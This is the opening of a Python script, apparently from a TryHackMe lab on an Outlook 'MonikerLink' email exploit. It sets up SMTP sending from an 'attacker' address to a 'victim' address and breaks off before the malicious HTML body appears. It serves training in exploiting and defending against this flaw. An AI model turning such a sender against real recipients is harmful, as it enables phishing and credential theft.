''' Author: CMNatic | https://github.com/cmnatic Version: 1.0 | 19/02/2024 ''' import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr sender_email = 'attacker@monikerlink.thm' # Replace with your sender email address receiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address password = input("Enter your attacker email password: ") html_content = """\